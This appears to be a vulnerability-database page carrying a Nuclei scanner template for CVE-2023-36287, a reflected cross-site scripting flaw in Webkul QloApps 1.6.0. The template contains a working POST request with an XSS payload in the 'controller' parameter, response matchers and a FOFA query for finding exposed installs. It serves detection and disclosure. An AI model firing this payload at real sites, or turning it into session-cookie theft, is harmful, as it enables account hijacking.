Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2023-36287
HistoryJul 07, 2023 - 9:38 a.m.

Webkul QloApps 1.6.0 - Cross-site Scripting

2023-07-0709:38:49
ProjectDiscovery
github.com
4
cve2023
xss
webkul-qloapps
unauthenticated
session-hijacking
security-patch
web-vulnerability

CVSS3

6.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

EPSS

0.001

Percentile

34.8%

An unauthenticated Cross-Site Scripting (XSS) vulnerability found in Webkul QloApps 1.6.0 allows an attacker to obtain a user's session cookie and then impersonate that user via POST controller parameter.
id: CVE-2023-36287

info:
  name: Webkul QloApps 1.6.0 - Cross-site Scripting
  author: theamanrawat
  severity: medium
  description: |
    An unauthenticated Cross-Site Scripting (XSS) vulnerability found in Webkul QloApps 1.6.0 allows an attacker to obtain a user's session cookie and then impersonate that user via POST controller parameter.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.
  remediation: |
    To remediate this issue, it is recommended to apply the latest security patches or updates provided by the vendor.
  reference:
    - https://github.com/webkul/hotelcommerce
    - https://flashy-lemonade-192.notion.site/Cross-site-scripting-via-controller-parameter-in-QloApps-1-6-0-97e409ce164f40d195b625b9bf719900
    - https://nvd.nist.gov/vuln/detail/CVE-2023-36287
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-36287
    cwe-id: CWE-79
    epss-score: 0.0009
    epss-percentile: 0.38405
    cpe: cpe:2.3:a:webkul:qloapps:1.6.0:*:*:*:*:*:*:*
  metadata:
    verified: "true"
    max-request: 1
    vendor: webkul
    product: qloapps
    fofa-query: title="qloapps"
  tags: cve2023,cve,xss,webkul-qloapps,unauth,webkul

http:
  - raw:
      - |
        POST / HTTP/2
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        controller=change-currency9405'-alert(document.domain)-'&id_currency=

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "'change-currency9405'-alert(document.domain)-'';"
          - "customizationIdMessage"
        condition: and

      - type: word
        part: header
        words:
          - 'text/html'

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100c8d8b8a7e397064411042c3c9892231cf0075e26054416f0d77179c53a88a107022100eeec4f5165b4101d2bd809a7cbd2dfaee4950ab40d84ff7e6876c7089b79a01e:922c64590222798bb761d5b6d8e72950

CVSS3

6.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

EPSS

0.001

Percentile

34.8%

Related for NUCLEI:CVE-2023-36287